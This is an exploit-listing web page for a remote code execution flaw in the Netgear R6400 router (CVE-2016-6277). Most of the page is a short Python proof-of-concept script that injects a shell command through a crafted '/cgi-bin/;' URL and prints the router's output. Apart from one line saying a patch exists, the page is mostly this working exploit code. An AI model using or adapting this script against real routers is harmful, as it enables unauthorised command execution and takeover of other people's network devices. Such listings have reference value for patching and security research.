header-logo
Suggest Exploit
vendor:
R6400
by:
Kevin Randall
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: R6400
Affected Version From: V1.0.7.2_1.1.93
Affected Version To: V1.0.7.2_1.1.93
Patch Exists: YES
Related CWE: CVE-2016-6277
CPE: h:netgear:r6400
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Netgear R6400 – Remote Code Execution

This exploit allows an attacker to execute arbitrary code on the vulnerable Netgear R6400 router. The exploit is triggered by sending a specially crafted HTTP request to the router's web server. The request contains a command that is executed on the router. The output of the command is then returned to the attacker.

Mitigation:

Netgear has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python

import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word =  "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result

Navigation

Suggest Exploit

Services By CQR